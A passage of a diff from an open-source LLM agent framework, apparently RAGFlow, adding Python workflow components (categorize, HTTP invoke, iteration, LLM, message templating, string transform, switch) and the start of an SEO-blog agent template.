 {}
 Here's description of each category:
 - {}
 ---- Instructions ----
 - Consider both explicit mentions and implied context
 - Prioritize the most specific applicable category
 - Return only the category name without explanations
 - Use "Other" only when no other category fits
 """.format(
            "\n - ".join(list(self.category_description.keys())),
            "\n".join(descriptions)
        )
        if cate_lines:
            self.sys_prompt += """
 ---- Examples ----
 {}
 """.format("\n".join(cate_lines))
 class Categorize(LLM, ABC):
    component_name = "Categorize"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        msg = self._canvas.get_history(self._param.message_history_window_size)
        if not msg:
            msg = [{"role": "user", "content": ""}]
        if kwargs.get("sys.query"):
            msg[-1]["content"] = kwargs["sys.query"]
            self.set_input_value("sys.query", kwargs["sys.query"])
        else:
            msg[-1]["content"] = self._canvas.get_variable_value(self._param.query)
            self.set_input_value(self._param.query, msg[-1]["content"])
        self._param.update_prompt()
        chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
        user_prompt = """
 ---- Real Data ----
 {} → 
 """.format(" | ".join(["{}: \"{}\"".format(c["role"].upper(), re.sub(r"\n", "", c["content"], flags=re.DOTALL)) for c in msg]))
        ans = chat_mdl.chat(self._param.sys_prompt, [{"role": "user", "content": user_prompt}], self._param.gen_conf())
        logging.info(f"input: {user_prompt}, answer: {str(ans)}")
        if ERROR_PREFIX in ans:
            raise Exception(ans)
        # Count the number of times each category appears in the answer.
        category_counts = {}
        for c in self._param.category_description.keys():
            count = ans.lower().count(c.lower())
            category_counts[c] = count
        cpn_ids = list(self._param.category_description.items())[-1][1]["to"]
        max_category = list(self._param.category_description.keys())[0]
        if any(category_counts.values()):
            max_category = max(category_counts.items(), key=lambda x: x[1])[0]
            cpn_ids = self._param.category_description[max_category]["to"]
        self.set_output("category_name", max_category)
        self.set_output("_next", cpn_ids)
    def thoughts(self) -> str:
        return "Which should it falls into {}? ...".format(",".join([f"`{c}`" for c, _ in self._param.category_description.items()]))
--- a/agent/component/fillup.py
+++ b/agent/component/fillup.py
@ -0,0 +1,40 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from agent.component.base import ComponentBase, ComponentParamBase
 class UserFillUpParam(ComponentParamBase):
    def __init__(self):
        super().__init__()
        self.enable_tips = True
        self.tips = "Please fill up the form"
    def check(self) -> bool:
        return True
 class UserFillUp(ComponentBase):
    component_name = "UserFillUp"
    def _invoke(self, **kwargs):
        for k, v in kwargs.get("inputs", {}).items():
            self.set_output(k, v)
    def thoughts(self) -> str:
        return "Waiting for your input..."
--- a/agent/component/invoke.py
+++ b/agent/component/invoke.py
@ -0,0 +1,142 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import json
 import logging
 import os
 import re
 import time
 from abc import ABC
 import requests
 from api.utils.api_utils import timeout
 from deepdoc.parser import HtmlParser
 from agent.component.base import ComponentBase, ComponentParamBase
 class InvokeParam(ComponentParamBase):
    """
    Define the Crawler component parameters.
    """
    def __init__(self):
        super().__init__()
        self.proxy = None
        self.headers = ""
        self.method = "get"
        self.variables = []
        self.url = ""
        self.timeout = 60
        self.clean_html = False
        self.datatype = "json"  # New parameter to determine data posting type
    def check(self):
        self.check_valid_value(self.method.lower(), "Type of content from the crawler", ['get', 'post', 'put'])
        self.check_empty(self.url, "End point URL")
        self.check_positive_integer(self.timeout, "Timeout time in second")
        self.check_boolean(self.clean_html, "Clean HTML")
        self.check_valid_value(self.datatype.lower(), "Data post type", ['json', 'formdata'])  # Check for valid datapost value
 class Invoke(ComponentBase, ABC):
    component_name = "Invoke"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 3))
    def _invoke(self, **kwargs):
        args = {}
        for para in self._param.variables:
            if para.get("value") is not None:
                args[para["key"]] = para["value"]
            else:
                args[para["key"]] = self._canvas.get_variable_value(para["ref"])
        url = self._param.url.strip()
        if url.find("http") != 0:
            url = "http://" + url
        method = self._param.method.lower()
        headers = {}
        if self._param.headers:
            headers = json.loads(self._param.headers)
        proxies = None
        if re.sub(r"https?:?/?/?", "", self._param.proxy):
            proxies = {"http": self._param.proxy, "https": self._param.proxy}
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                if method == 'get':
                    response = requests.get(url=url,
                                            params=args,
                                            headers=headers,
                                            proxies=proxies,
                                            timeout=self._param.timeout)
                    if self._param.clean_html:
                        sections = HtmlParser()(None, response.content)
                        self.set_output("result", "\n".join(sections))
                    else:
                        self.set_output("result", response.text)
                if method == 'put':
                    if self._param.datatype.lower() == 'json':
                        response = requests.put(url=url,
                                                json=args,
                                                headers=headers,
                                                proxies=proxies,
                                                timeout=self._param.timeout)
                    else:
                        response = requests.put(url=url,
                                                data=args,
                                                headers=headers,
                                                proxies=proxies,
                                                timeout=self._param.timeout)
                    if self._param.clean_html:
                        sections = HtmlParser()(None, response.content)
                        self.set_output("result", "\n".join(sections))
                    else:
                        self.set_output("result", response.text)
                if method == 'post':
                    if self._param.datatype.lower() == 'json':
                        response = requests.post(url=url,
                                                 json=args,
                                                 headers=headers,
                                                 proxies=proxies,
                                                 timeout=self._param.timeout)
                    else:
                        response = requests.post(url=url,
                                                 data=args,
                                                 headers=headers,
                                                 proxies=proxies,
                                                 timeout=self._param.timeout)
                    if self._param.clean_html:
                        self.set_output("result", "\n".join(sections))
                    else:
                        self.set_output("result", response.text)
                return self.output("result")
            except Exception as e:
                last_e = e
                logging.exception(f"Http request error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Http request error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return "Waiting for the server respond..."
--- a/agent/component/iteration.py
+++ b/agent/component/iteration.py
@ -0,0 +1,60 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from abc import ABC
 from agent.component.base import ComponentBase, ComponentParamBase
 class IterationParam(ComponentParamBase):
    """
    Define the Iteration component parameters.
    """
    def __init__(self):
        super().__init__()
        self.items_ref = ""
    def get_input_form(self) -> dict[str, dict]:
        return {
            "items": {
                "type": "json",
                "name": "Items"
            }
        }
    def check(self):
        return True
 class Iteration(ComponentBase, ABC):
    component_name = "Iteration"
    def get_start(self):
        for cid in self._canvas.components.keys():
            if self._canvas.get_component(cid)["obj"].component_name.lower() != "iterationitem":
                continue
            if self._canvas.get_component(cid)["parent_id"] == self._id:
                return cid
    def _invoke(self, **kwargs):
        arr = self._canvas.get_variable_value(self._param.items_ref)
        if not isinstance(arr, list):
            self.set_output("_ERROR", self._param.items_ref + " must be an array, but its type is "+str(type(arr)))
    def thoughts(self) -> str:
        return "Need to process {} items.".format(len(self._canvas.get_variable_value(self._param.items_ref)))
--- a/agent/component/iterationitem.py
+++ b/agent/component/iterationitem.py
@ -0,0 +1,83 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from abc import ABC
 from agent.component.base import ComponentBase, ComponentParamBase
 class IterationItemParam(ComponentParamBase):
    """
    Define the IterationItem component parameters.
    """
    def check(self):
        return True
 class IterationItem(ComponentBase, ABC):
    component_name = "IterationItem"
    def __init__(self, canvas, id, param: ComponentParamBase):
        super().__init__(canvas, id, param)
        self._idx = 0
    def _invoke(self, **kwargs):
        parent = self.get_parent()
        arr = self._canvas.get_variable_value(parent._param.items_ref)
        if not isinstance(arr, list):
            self._idx = -1
            raise Exception(parent._param.items_ref + " must be an array, but its type is "+str(type(arr)))
        if self._idx > 0:
            self.output_collation()
        if self._idx >= len(arr):
            self._idx = -1
            return
        self.set_output("item", arr[self._idx])
        self.set_output("index", self._idx)
        self._idx += 1
    def output_collation(self):
        pid = self.get_parent()._id
        for cid in self._canvas.components.keys():
            obj = self._canvas.get_component_obj(cid)
            p = obj.get_parent()
            if not p:
                continue
            if p._id != pid:
                continue
            if p.component_name.lower() in ["categorize", "message", "switch", "userfillup", "interationitem"]:
                continue
            for k, o in p._param.outputs.items():
                if "ref" not in o:
                    continue
                _cid, var = o["ref"].split("@")
                if _cid != cid:
                    continue
                res = p.output(k)
                if not res:
                    res = []
                res.append(obj.output(var))
                p.set_output(k, res)
    def end(self):
        return self._idx == -1
    def thoughts(self) -> str:
        return "Next turn..."
--- a/agent/component/llm.py
+++ b/agent/component/llm.py
@ -0,0 +1,269 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import json
 import logging
 import os
 import re
 from typing import Any
 import json_repair
 from copy import deepcopy
 from functools import partial
 from api.db import LLMType
 from api.db.services.llm_service import LLMBundle, TenantLLMService
 from agent.component.base import ComponentBase, ComponentParamBase
 from api.utils.api_utils import timeout
 from rag.prompts import message_fit_in, citation_prompt
 from rag.prompts.prompts import tool_call_summary
 class LLMParam(ComponentParamBase):
    """
    Define the LLM component parameters.
    """
    def __init__(self):
        super().__init__()
        self.llm_id = ""
        self.sys_prompt = ""
        self.prompts = [{"role": "user", "content": "{sys.query}"}]
        self.max_tokens = 0
        self.temperature = 0
        self.top_p = 0
        self.presence_penalty = 0
        self.frequency_penalty = 0
        self.output_structure = None
        self.cite = True
        self.visual_files_var = None
    def check(self):
        self.check_decimal_float(float(self.temperature), "[Agent] Temperature")
        self.check_decimal_float(float(self.presence_penalty), "[Agent] Presence penalty")
        self.check_decimal_float(float(self.frequency_penalty), "[Agent] Frequency penalty")
        self.check_nonnegative_number(int(self.max_tokens), "[Agent] Max tokens")
        self.check_decimal_float(float(self.top_p), "[Agent] Top P")
        self.check_empty(self.llm_id, "[Agent] LLM")
        self.check_empty(self.sys_prompt, "[Agent] System prompt")
        self.check_empty(self.prompts, "[Agent] User prompt")
    def gen_conf(self):
        conf = {}
        def get_attr(nm):
            try:
                return getattr(self, nm)
            except Exception:
                pass
        if int(self.max_tokens) > 0 and get_attr("maxTokensEnabled"):
            conf["max_tokens"] = int(self.max_tokens)
        if float(self.temperature) > 0 and get_attr("temperatureEnabled"):
            conf["temperature"] = float(self.temperature)
        if float(self.top_p) > 0 and get_attr("topPEnabled"):
            conf["top_p"] = float(self.top_p)
        if float(self.presence_penalty) > 0 and get_attr("presencePenaltyEnabled"):
            conf["presence_penalty"] = float(self.presence_penalty)
        if float(self.frequency_penalty) > 0 and get_attr("frequencyPenaltyEnabled"):
            conf["frequency_penalty"] = float(self.frequency_penalty)
        return conf
 class LLM(ComponentBase):
    component_name = "LLM"
    def __init__(self, canvas, id, param: ComponentParamBase):
        super().__init__(canvas, id, param)
        self.chat_mdl = LLMBundle(self._canvas.get_tenant_id(), TenantLLMService.llm_id2llm_type(self._param.llm_id),
                                  self._param.llm_id, max_retries=self._param.max_retries,
                                  retry_interval=self._param.delay_after_error
                                  )
        self.imgs = []
    def get_input_form(self) -> dict[str, dict]:
        res = {}
        for k, v in self.get_input_elements().items():
            res[k] = {
                "type": "line",
                "name": v["name"]
            }
        return res
    def get_input_elements(self) -> dict[str, Any]:
        res = self.get_input_elements_from_text(self._param.sys_prompt)
        for prompt in self._param.prompts:
            d = self.get_input_elements_from_text(prompt["content"])
            res.update(d)
        return res
    def set_debug_inputs(self, inputs: dict[str, dict]):
        self._param.debug_inputs = inputs
    def add2system_prompt(self, txt):
        self._param.sys_prompt += txt
    def _prepare_prompt_variables(self):
        if self._param.visual_files_var:
            self.imgs = self._canvas.get_variable_value(self._param.visual_files_var)
            if not self.imgs:
                self.imgs = []
            self.imgs = [img for img in self.imgs if img[:len("data:image/")] == "data:image/"]
            if self.imgs and TenantLLMService.llm_id2llm_type(self._param.llm_id) == LLMType.CHAT.value:
                self.chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.IMAGE2TEXT.value,
                                          self._param.llm_id, max_retries=self._param.max_retries,
                                          retry_interval=self._param.delay_after_error
                                          )
        args = {}
        vars = self.get_input_elements() if not self._param.debug_inputs else self._param.debug_inputs
        prompt = self._param.sys_prompt
        for k, o in vars.items():
            args[k] = o["value"]
            if not isinstance(args[k], str):
                try:
                    args[k] = json.dumps(args[k], ensure_ascii=False)
                except Exception:
                    args[k] = str(args[k])
            self.set_input_value(k, args[k])
        msg = self._canvas.get_history(self._param.message_history_window_size)[:-1]
        msg.extend(deepcopy(self._param.prompts))
        prompt = self.string_format(prompt, args)
        for m in msg:
            m["content"] = self.string_format(m["content"], args)
        if self._canvas.get_reference()["chunks"]:
            prompt += citation_prompt()
        return prompt, msg
    def _generate(self, msg:list[dict], **kwargs) -> str:
        if not self.imgs:
            return self.chat_mdl.chat(msg[0]["content"], msg[1:], self._param.gen_conf(), **kwargs)
        return self.chat_mdl.chat(msg[0]["content"], msg[1:], self._param.gen_conf(), images=self.imgs, **kwargs)
    def _generate_streamly(self, msg:list[dict], **kwargs) -> str:
        ans = ""
        last_idx = 0
        endswith_think = False
        def delta(txt):
            nonlocal ans, last_idx, endswith_think
            delta_ans = txt[last_idx:]
            ans = txt
            if delta_ans.find("<think>") == 0:
                last_idx += len("<think>")
                return "<think>"
            elif delta_ans.find("<think>") > 0:
                delta_ans = txt[last_idx:last_idx+delta_ans.find("<think>")]
                last_idx += delta_ans.find("<think>")
                return delta_ans
            elif delta_ans.endswith("</think>"):
                endswith_think = True
            elif endswith_think:
                endswith_think = False
                return "</think>"
            last_idx = len(ans)
            if ans.endswith("</think>"):
                last_idx -= len("</think>")
            return re.sub(r"(<think>|</think>)", "", delta_ans)
        if not self.imgs:
            for txt in self.chat_mdl.chat_streamly(msg[0]["content"], msg[1:], self._param.gen_conf(), **kwargs):
                yield delta(txt)
        else:
            for txt in self.chat_mdl.chat_streamly(msg[0]["content"], msg[1:], self._param.gen_conf(), images=self.imgs, **kwargs):
                yield delta(txt)
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        def clean_formated_answer(ans: str) -> str:
            ans = re.sub(r"^.*</think>", "", ans, flags=re.DOTALL)
            ans = re.sub(r"^.*```json", "", ans, flags=re.DOTALL)
            return re.sub(r"```\n*$", "", ans, flags=re.DOTALL)
        prompt, msg = self._prepare_prompt_variables()
        error = ""
        if self._param.output_structure:
            prompt += "\nThe output MUST follow this JSON format:\n"+json.dumps(self._param.output_structure, ensure_ascii=False, indent=2)
            prompt += "\nRedundant information is FORBIDDEN."
            for _ in range(self._param.max_retries+1):
                _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
                error = ""
                ans = self._generate(msg)
                msg.pop(0)
                if ans.find("**ERROR**") >= 0:
                    logging.error(f"LLM response error: {ans}")
                    error = ans
                    continue
                try:
                    self.set_output("structured_content", json_repair.loads(clean_formated_answer(ans)))
                    return
                except Exception:
                    msg.append({"role": "user", "content": "The answer can't not be parsed as JSON"})
                    error = "The answer can't not be parsed as JSON"
            if error:
                self.set_output("_ERROR", error)
            return
        downstreams = self._canvas.get_component(self._id)["downstream"] if self._canvas.get_component(self._id) else []
        ex = self.exception_handler()
        if any([self._canvas.get_component_obj(cid).component_name.lower()=="message" for cid in downstreams]) and not self._param.output_structure and not (ex and ex["goto"]):
            self.set_output("content", partial(self._stream_output, prompt, msg))
            return
        for _ in range(self._param.max_retries+1):
            _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
            error = ""
            ans = self._generate(msg)
            msg.pop(0)
            if ans.find("**ERROR**") >= 0:
                logging.error(f"LLM response error: {ans}")
                error = ans
                continue
            self.set_output("content", ans)
            break
        if error:
            if self.get_exception_default_value():
                self.set_output("content", self.get_exception_default_value())
            else:
                self.set_output("_ERROR", error)
    def _stream_output(self, prompt, msg):
        _, msg = message_fit_in([{"role": "system", "content": prompt}, *msg], int(self.chat_mdl.max_length * 0.97))
        answer = ""
        for ans in self._generate_streamly(msg):
            if ans.find("**ERROR**") >= 0:
                if self.get_exception_default_value():
                    self.set_output("content", self.get_exception_default_value())
                    yield self.get_exception_default_value()
                else:
                    self.set_output("_ERROR", ans)
                return
            yield ans
            answer += ans
        self.set_output("content", answer)
    def add_memory(self, user:str, assist:str, func_name: str, params: dict, results: str):
        summ = tool_call_summary(self.chat_mdl, func_name, params, results)
        logging.info(f"[MEMORY]: {summ}")
        self._canvas.add_memory(user, assist, summ)
    def thoughts(self) -> str:
        _, msg = self._prepare_prompt_variables()
        return "⌛Give me a moment—starting from: \n\n" + re.sub(r"(User's query:|[\\]+)", '', msg[-1]['content'], flags=re.DOTALL) + "\n\nI’ll figure out our best next move."
--- a/agent/component/message.py
+++ b/agent/component/message.py
@ -0,0 +1,146 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import json
 import os
 import random
 import re
 from functools import partial
 from typing import Any
 from agent.component.base import ComponentBase, ComponentParamBase
 from jinja2 import Template as Jinja2Template
 from api.utils.api_utils import timeout
 class MessageParam(ComponentParamBase):
    """
    Define the Message component parameters.
    """
    def __init__(self):
        super().__init__()
        self.content = []
        self.stream = True
        self.outputs = {
            "content": {
                "type": "str"
            }
        }
    def check(self):
        self.check_empty(self.content, "[Message] Content")
        self.check_boolean(self.stream, "[Message] stream")
        return True
 class Message(ComponentBase):
    component_name = "Message"
    def get_kwargs(self, script:str, kwargs:dict = {}, delimeter:str=None) -> tuple[str, dict[str, str | list | Any]]:
        for k,v in self.get_input_elements_from_text(script).items():
            if k in kwargs:
                continue
            v = v["value"]
            ans = ""
            if isinstance(v, partial):
                for t in v():
                    ans += t
            elif isinstance(v, list) and delimeter:
                ans = delimeter.join([str(vv) for vv in v])
            elif not isinstance(v, str):
                try:
                    ans = json.dumps(v, ensure_ascii=False)
                except Exception:
                    pass
            else:
                ans = v
            if not ans:
                ans = ""
            kwargs[k] = ans
            self.set_input_value(k, ans)
        _kwargs = {}
        for n, v in kwargs.items():
            _n = re.sub("[@:.]", "_", n)
            script = re.sub(r"\{%s\}" % re.escape(n), _n, script)
            _kwargs[_n] = v
        return script, _kwargs
    def _stream(self, rand_cnt:str):
        s = 0
        all_content = ""
        cache = {}
        for r in re.finditer(self.variable_ref_patt, rand_cnt, flags=re.DOTALL):
            all_content += rand_cnt[s: r.start()]
            yield rand_cnt[s: r.start()]
            s = r.end()
            exp = r.group(1)
            if exp in cache:
                yield cache[exp]
                all_content += cache[exp]
                continue
            v = self._canvas.get_variable_value(exp)
            if isinstance(v, partial):
                cnt = ""
                for t in v():
                    all_content += t
                    cnt += t
                    yield t
                continue
            elif not isinstance(v, str):
                try:
                    v = json.dumps(v, ensure_ascii=False, indent=2)
                except Exception:
                    v = str(v)
            yield v
            all_content += v
            cache[exp] = v
        if s < len(rand_cnt):
            all_content += rand_cnt[s: ]
            yield rand_cnt[s: ]
        self.set_output("content", all_content)
    def _is_jinjia2(self, content:str) -> bool:
        patt = [
            r"\{%.*%\}", "{{", "}}"
        ]
        return any([re.search(p, content) for p in patt])
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        rand_cnt = random.choice(self._param.content)
        if self._param.stream and not self._is_jinjia2(rand_cnt):
            self.set_output("content", partial(self._stream, rand_cnt))
            return
        rand_cnt, kwargs = self.get_kwargs(rand_cnt, kwargs)
        template = Jinja2Template(rand_cnt)
        try:
            content = template.render(kwargs)
        except Exception:
            pass
        for n, v in kwargs.items():
            content = re.sub(n, v, content)
        self.set_output("content", content)
    def thoughts(self) -> str:
        return ""
--- a/agent/component/string_transform.py
+++ b/agent/component/string_transform.py
@ -0,0 +1,100 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import os
 import re
 from abc import ABC
 from jinja2 import Template as Jinja2Template
 from agent.component.base import ComponentParamBase
 from api.utils.api_utils import timeout
 from .message import Message
 class StringTransformParam(ComponentParamBase):
    """
    Define the code sandbox component parameters.
    """
    def __init__(self):
        super().__init__()
        self.method = "split"
        self.script = ""
        self.split_ref = ""
        self.delimiters = [","]
        self.outputs = {"result": {"value": "", "type": "string"}}
    def check(self):
        self.check_valid_value(self.method, "Support method", ["split", "merge"])
        self.check_empty(self.delimiters, "delimiters")
 class StringTransform(Message, ABC):
    component_name = "StringTransform"
    def get_input_form(self) -> dict[str, dict]:
        if self._param.method == "split":
            return {
                "line": {
                    "name": "String",
                    "type": "line"
                }
            }
        return {k: {
            "name": o["name"],
            "type": "line"
        } for k, o in self.get_input_elements_from_text(self._param.script).items()}
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        if self._param.method == "split":
            self._split(kwargs.get("line"))
        else:
            self._merge(kwargs)
    def _split(self, line:str|None = None):
        var = self._canvas.get_variable_value(self._param.split_ref) if not line else line
        if not var:
            var = ""
        assert isinstance(var, str), "The input variable is not a string: {}".format(type(var))
        self.set_input_value(self._param.split_ref, var)
        res = []
        for i,s in enumerate(re.split(r"(%s)"%("|".join([re.escape(d) for d in self._param.delimiters])), var, flags=re.DOTALL)):
            if i % 2 == 1:
                continue
            res.append(s)
        self.set_output("result", res)
    def _merge(self, kwargs:dict[str, str] = {}):
        script = self._param.script
        script, kwargs = self.get_kwargs(script, kwargs, self._param.delimiters[0])
        if self._is_jinjia2(script):
            template = Jinja2Template(script)
            try:
                script = template.render(kwargs)
            except Exception:
                pass
        for k,v in kwargs.items():
            if not v:
                v = ""
            script = re.sub(k, v, script)
        self.set_output("result", script)
    def thoughts(self) -> str:
        return f"It's {self._param.method}ing."
--- a/agent/component/switch.py
+++ b/agent/component/switch.py
@ -0,0 +1,131 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import numbers
 import os
 from abc import ABC
 from typing import Any
 from agent.component.base import ComponentBase, ComponentParamBase
 from api.utils.api_utils import timeout
 class SwitchParam(ComponentParamBase):
    """
    Define the Switch component parameters.
    """
    def __init__(self):
        super().__init__()
        """
        {
            "logical_operator" : "and | or"
            "items" : [
                            {"cpn_id": "categorize:0", "operator": "contains", "value": ""},
                            {"cpn_id": "categorize:0", "operator": "contains", "value": ""},...],
            "to": ""
        }
        """
        self.conditions = []
        self.end_cpn_ids = []
        self.operators = ['contains', 'not contains', 'start with', 'end with', 'empty', 'not empty', '=', '≠', '>',
                          '<', '≥', '≤']
    def check(self):
        self.check_empty(self.conditions, "[Switch] conditions")
        for cond in self.conditions:
            if not cond["to"]:
                raise ValueError("[Switch] 'To' can not be empty!")
        self.check_empty(self.end_cpn_ids, "[Switch] the ELSE/Other destination can not be empty.")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "urls": {
                "name": "URLs",
                "type": "line"
            }
        }
 class Switch(ComponentBase, ABC):
    component_name = "Switch"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 3))
    def _invoke(self, **kwargs):
        for cond in self._param.conditions:
            res = []
            for item in cond["items"]:
                if not item["cpn_id"]:
                    continue
                cpn_v = self._canvas.get_variable_value(item["cpn_id"])
                self.set_input_value(item["cpn_id"], cpn_v)
                operatee = item.get("value", "")
                if isinstance(cpn_v, numbers.Number):
                    operatee = float(operatee)
                res.append(self.process_operator(cpn_v, item["operator"], operatee))
                if cond["logical_operator"] != "and" and any(res):
                    self.set_output("next", [self._canvas.get_component_name(cpn_id) for cpn_id in cond["to"]])
                    self.set_output("_next", cond["to"])
                    return
            if all(res):
                self.set_output("next", [self._canvas.get_component_name(cpn_id) for cpn_id in cond["to"]])
                self.set_output("_next", cond["to"])
                return
        self.set_output("next", [self._canvas.get_component_name(cpn_id) for cpn_id in self._param.end_cpn_ids])
        self.set_output("_next", self._param.end_cpn_ids)
    def process_operator(self, input: Any, operator: str, value: Any) -> bool:
        if operator == "contains":
            return True if value.lower() in input.lower() else False
        elif operator == "not contains":
            return True if value.lower() not in input.lower() else False
        elif operator == "start with":
            return True if input.lower().startswith(value.lower()) else False
        elif operator == "end with":
            return True if input.lower().endswith(value.lower()) else False
        elif operator == "empty":
            return True if not input else False
        elif operator == "not empty":
            return True if input else False
        elif operator == "=":
            return True if input == value else False
        elif operator == "≠":
            return True if input != value else False
        elif operator == ">":
            try:
                return True if float(input) > float(value) else False
            except Exception:
                return True if input > value else False
        elif operator == "<":
            try:
                return True if float(input) < float(value) else False
            except Exception:
                return True if input < value else False
        elif operator == "≥":
            try:
                return True if float(input) >= float(value) else False
            except Exception:
                return True if input >= value else False
        elif operator == "≤":
            try:
                return True if float(input) <= float(value) else False
            except Exception:
                return True if input <= value else False
        raise ValueError('Not supported operator' + operator)
    def thoughts(self) -> str:
        return "I’m weighing a few options and will pick the next step shortly."
--- a/agent/settings.py
+++ b/agent/settings.py
@ -0,0 +1,18 @@
 #
 #  Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 FLOAT_ZERO = 1e-8
 PARAM_MAXDEPTH = 5
--- a/agent/templates/customer_review_analysis.json
+++ b/agent/templates/customer_review_analysis.json
--- a/agent/templates/customer_service.json
+++ b/agent/templates/customer_service.json
--- a/agent/templates/customer_support.json
+++ b/agent/templates/customer_support.json
--- a/agent/templates/cv_analysis_and_candidate_evaluation.json
+++ b/agent/templates/cv_analysis_and_candidate_evaluation.json
--- a/agent/templates/cv_evaluation.json
+++ b/agent/templates/cv_evaluation.json
--- a/agent/templates/deep_research.json
+++ b/agent/templates/deep_research.json
--- a/agent/templates/deep_search_r.json
+++ b/agent/templates/deep_search_r.json
--- a/agent/templates/generate_SEO_blog.json
+++ b/agent/templates/generate_SEO_blog.json
@ -0,0 +1,902 @@
 {
    "id": 8,
    "title": "Generate SEO Blog",
    "description": "This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI “writers”, where each agent plays a specialized role — just like a real editorial team.",
    "canvas_type": "Agent",
    "dsl": {
            "components": {
                "Agent:LuckyApplesGrab": {
                    "downstream": [
                        "Message:ModernSwansThrow"
                    ],
                    "obj": {
                        "component_name": "Agent",
                        "params": {
                            "delay_after_error": 1,
                            "description": "",
